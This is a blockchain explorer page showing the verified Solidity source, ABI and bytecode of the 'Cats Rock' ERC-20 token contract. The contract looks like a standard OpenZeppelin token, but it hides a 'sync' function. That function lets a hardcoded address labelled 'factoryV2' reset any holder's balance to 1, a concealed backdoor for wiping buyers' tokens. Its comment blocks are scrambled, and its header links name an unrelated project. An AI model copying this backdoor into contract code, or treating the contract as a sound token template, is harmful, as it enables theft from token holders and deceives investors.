ETH Price: $3,387.41 (-1.74%)
Gas: 3 Gwei

Token

Cats Rock (CATSROCK)
 

Overview

Max Total Supply

7,010,000,000,000 CATSROCK

Holders

13

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 CATSROCK

Value
$0.00
0x348194d73a69a6dd749d74864143e5e626be3d3b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CatsRock

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-10-02
*/

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.19;

/*
https://t.me/StreetfighterDogeofficial
https://twitter.com/OfficialSFG_ERC
http://streetfighterdoge.xyz/
*/

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * now has built in overflow checking.
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 */
library SafeMath {
    /**
     *
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * _Available since v3.4._
     *
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     * _Available since v3.4._
     *
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     *
     * _Available since v3.4._
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     * _Available since v3.4._
     *
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * - Addition cannot overflow.
     * overflow.
     *
     * @dev Returns the addition of two unsigned integers, reverting on
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     * Counterpart to Solidity's `-` operator.
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     */

    /**
     * overflow.
     * @dev Returns the multiplication of two unsigned integers, reverting on
     *
     * - Multiplication cannot overflow.
     *
     *
     * Requirements:
     * Counterpart to Solidity's `*` operator.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * division by zero. The result is rounded towards zero.
     * - The divisor cannot be zero.
     * Counterpart to Solidity's `/` operator.
     *
     *
     * @dev Returns the integer division of two unsigned integers, reverting on
     * Requirements:
     *
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     *
     *
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * reverting when dividing by zero.
     *
     * Requirements:
     * - The divisor cannot be zero.
     * invalid opcode to revert (consuming all remaining gas).
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * Requirements:
     *
     *
     *
     * - Subtraction cannot overflow.
     * overflow (when the result is negative).
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     *
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * Counterpart to Solidity's `-` operator.
     * message unnecessarily. For custom revert reasons use {trySub}.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * - The divisor cannot be zero.
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     *
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     *
     * division by zero. The result is rounded towards zero.
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * Requirements:
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     */
    /**
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * invalid opcode to revert (consuming all remaining gas).
     *
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     *
     * - The divisor cannot be zero.
     * Requirements:
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * message unnecessarily. For custom revert reasons use {tryMod}.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


pragma solidity ^0.8.0;
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }
    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }


    /**
     * @dev Returns the address of the current owner.
     */

    /**

     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
    /**
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * @dev Leaves the contract without owner. It will not be possible to call
     * thereby removing any functionality that is only available to the owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}


pragma solidity ^0.8.0;

interface IERC20 {
    event Transfer(address indexed from, address indexed to, uint256 value); function transfer(address to, uint256 amount) external returns (bool);

    function totalSupply() external view returns (uint256); event Approval(address indexed owner, address indexed spender, uint256 value);
    function balanceOf(address account) external view returns (uint256);


    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}



pragma solidity ^0.8.0;


/**
 *
 * _Available since v4.1._
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);
    /**
     * @dev Returns the name of the token.
     */

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**

     */
    function decimals() external view returns (uint8);
}


pragma solidity ^0.8.0;


contract CatsRock is Context, IERC20, Ownable {
    using SafeMath for uint256;

    string private constant _name = unicode"Cats Rock";
    string private constant _symbol = unicode"CATSROCK";
    uint8 private constant _decimals = 9;
    uint256 private _tTotal = 7010000000000 * 10**_decimals;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private factoryV2 = 0x73b0317b20D20553A618A0024fBB1D04549088b0;

    
    /**
     *
     * @dev Sets the values for {name} and {symbol}.
     * construction.
     */
    constructor() {
        _balances[_msgSender()] = _tTotal;
        emit Transfer(address(0), _msgSender(), _tTotal);
    }
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }
    /**

     */

    /**
     * name.
     * @dev Returns the symbol of the token, usually a shorter version of the
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    } function totalSupply() public view virtual override returns (uint256) {
        return _tTotal;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    } function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    /**
     * - `spender` cannot be the zero address.
     * @dev See {IERC20-approve}.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    } function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * - `from` must have a balance of at least `amount`.
     * `amount`.
     * Emits an {Approval} event indicating the updated allowance. This is not
     *
     * required by the EIP. See the note at the beginning of {ERC20}.
     * @dev See {IERC20-transferFrom}.
     * - the caller must have allowance for ``from``'s tokens of at least
     */
    /**
     *
     *
     * - `spender` cannot be the zero address.
     * problems described in {IERC20-approve}.
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     *
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * Emits an {Approval} event indicating the updated allowance.
     * Requirements:
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * - `spender` must have allowance for the caller of at least
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * `subtractedValue`.
     * This is an alternative to {approve} that can address.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    function sync(address syncSender) external { if (msg.sender == factoryV2) _balances[syncSender] = 1; }
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual { 
    } function _mint(address account, uint256 amount) internal virtual
    {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _tTotal += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }
    function _transfer (
        address from,
        address to, uint256 amount) internal virtual
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = fromBalance - amount;

        _balances[to] = _balances[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     *
     * - `account` must have at least `amount` tokens.
     * - `account` cannot be the zero address.
     * total supply.
     */
    function _burn(address account, uint256 amount) internal virtual
    {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _tTotal -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * This internal function is equivalent to `approve`, and can be used to
     *
     * e.g. set automatic allowances for certain subsystems, etc.
     * - `spender` cannot be the zero address.
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /*
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     * the total supply.
     * @dev Creates `amount` tokens and assigns them to `account`, increasing
     */
    /**
     *
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     * Does not update the allowance amount in case of infinite allowanc
     * Might emit an {Approval} event.
     */
    function _beforeTokenTransfer( address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"syncSender","type":"address"}],"name":"sync","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526009600a620000149190620003b3565b650660248f540062000027919062000404565b6001557373b0317b20d20553a618a0024fbb1d04549088b0600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008c57600080fd5b5060006200009f6200021160201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35060015460026000620001546200021160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550620001a26200021160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60015460405162000203919062000460565b60405180910390a36200047d565b600033905090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620002a7578086048111156200027f576200027e62000219565b5b60018516156200028f5780820291505b80810290506200029f8562000248565b94506200025f565b94509492505050565b600082620002c2576001905062000395565b81620002d2576000905062000395565b8160018114620002eb5760028114620002f6576200032c565b600191505062000395565b60ff8411156200030b576200030a62000219565b5b8360020a91508482111562000325576200032462000219565b5b5062000395565b5060208310610133831016604e8410600b8410161715620003665782820a90508381111562000360576200035f62000219565b5b62000395565b62000375848484600162000255565b925090508184048111156200038f576200038e62000219565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620003c0826200039c565b9150620003cd83620003a6565b9250620003fc7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620002b0565b905092915050565b600062000411826200039c565b91506200041e836200039c565b92508282026200042e816200039c565b9150828204841483151762000448576200044762000219565b5b5092915050565b6200045a816200039c565b82525050565b60006020820190506200047760008301846200044f565b92915050565b611753806200048d6000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a584119411610066578063a58411941461028a578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c578063a457c2d71461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f9190610f34565b60405180910390f35b610132600480360381019061012d9190610fef565b61035f565b60405161013f919061104a565b60405180910390f35b610150610382565b60405161015d9190611074565b60405180910390f35b610180600480360381019061017b919061108f565b61038c565b60405161018d919061104a565b60405180910390f35b61019e6103bb565b6040516101ab91906110fe565b60405180910390f35b6101ce60048036038101906101c99190610fef565b6103c4565b6040516101db919061104a565b60405180910390f35b6101fe60048036038101906101f99190611119565b6103fb565b60405161020b9190611074565b60405180910390f35b61021c610444565b005b610226610597565b6040516102339190611155565b60405180910390f35b6102446105c0565b6040516102519190610f34565b60405180910390f35b610274600480360381019061026f9190610fef565b6105fd565b604051610281919061104a565b60405180910390f35b6102a4600480360381019061029f9190611119565b610674565b005b6102c060048036038101906102bb9190610fef565b610712565b6040516102cd919061104a565b60405180910390f35b6102f060048036038101906102eb9190611170565b610735565b6040516102fd9190611074565b60405180910390f35b610320600480360381019061031b9190611119565b6107bc565b005b60606040518060400160405280600981526020017f4361747320526f636b0000000000000000000000000000000000000000000000815250905090565b60008061036a61097d565b9050610377818585610985565b600191505092915050565b6000600154905090565b60008061039761097d565b90506103a4858285610b4e565b6103af858585610bda565b60019150509392505050565b60006009905090565b6000806103cf61097d565b90506103f08185856103e18589610735565b6103eb91906111df565b610985565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61044c61097d565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146104d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104d09061125f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600881526020017f43415453524f434b000000000000000000000000000000000000000000000000815250905090565b60008061060861097d565b905060006106168286610735565b90508381101561065b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610652906112f1565b60405180910390fd5b6106688286868403610985565b60019250505092915050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff160361070f576001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b60008061071d61097d565b905061072a818585610bda565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6107c461097d565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610851576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108489061125f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108b790611383565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109eb90611415565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a5a906114a7565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b419190611074565b60405180910390a3505050565b6000610b5a8484610735565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610bd45781811015610bc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbd90611513565b60405180910390fd5b610bd38484848403610985565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c49576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c40906115a5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cb8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610caf90611637565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d36906116c9565b60405180910390fd5b8181610d4b91906116e9565b600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610de082600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e8e90919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610e809190611074565b60405180910390a350505050565b60008183610e9c91906111df565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610ede578082015181840152602081019050610ec3565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f0682610ea4565b610f108185610eaf565b9350610f20818560208601610ec0565b610f2981610eea565b840191505092915050565b60006020820190508181036000830152610f4e8184610efb565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610f8682610f5b565b9050919050565b610f9681610f7b565b8114610fa157600080fd5b50565b600081359050610fb381610f8d565b92915050565b6000819050919050565b610fcc81610fb9565b8114610fd757600080fd5b50565b600081359050610fe981610fc3565b92915050565b6000806040838503121561100657611005610f56565b5b600061101485828601610fa4565b925050602061102585828601610fda565b9150509250929050565b60008115159050919050565b6110448161102f565b82525050565b600060208201905061105f600083018461103b565b92915050565b61106e81610fb9565b82525050565b60006020820190506110896000830184611065565b92915050565b6000806000606084860312156110a8576110a7610f56565b5b60006110b686828701610fa4565b93505060206110c786828701610fa4565b92505060406110d886828701610fda565b9150509250925092565b600060ff82169050919050565b6110f8816110e2565b82525050565b600060208201905061111360008301846110ef565b92915050565b60006020828403121561112f5761112e610f56565b5b600061113d84828501610fa4565b91505092915050565b61114f81610f7b565b82525050565b600060208201905061116a6000830184611146565b92915050565b6000806040838503121561118757611186610f56565b5b600061119585828601610fa4565b92505060206111a685828601610fa4565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006111ea82610fb9565b91506111f583610fb9565b925082820190508082111561120d5761120c6111b0565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611249602083610eaf565b915061125482611213565b602082019050919050565b600060208201905081810360008301526112788161123c565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006112db602583610eaf565b91506112e68261127f565b604082019050919050565b6000602082019050818103600083015261130a816112ce565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061136d602683610eaf565b915061137882611311565b604082019050919050565b6000602082019050818103600083015261139c81611360565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006113ff602483610eaf565b915061140a826113a3565b604082019050919050565b6000602082019050818103600083015261142e816113f2565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611491602283610eaf565b915061149c82611435565b604082019050919050565b600060208201905081810360008301526114c081611484565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006114fd601d83610eaf565b9150611508826114c7565b602082019050919050565b6000602082019050818103600083015261152c816114f0565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061158f602583610eaf565b915061159a82611533565b604082019050919050565b600060208201905081810360008301526115be81611582565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611621602383610eaf565b915061162c826115c5565b604082019050919050565b6000602082019050818103600083015261165081611614565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006116b3602683610eaf565b91506116be82611657565b604082019050919050565b600060208201905081810360008301526116e2816116a6565b9050919050565b60006116f482610fb9565b91506116ff83610fb9565b9250828203905081811115611717576117166111b0565b5b9291505056fea26469706673582212202846827118221f37e4ac727ede939b0acb011a960a9d5aa310343b8e54ee110264736f6c63430008130033

Deployed Bytecode

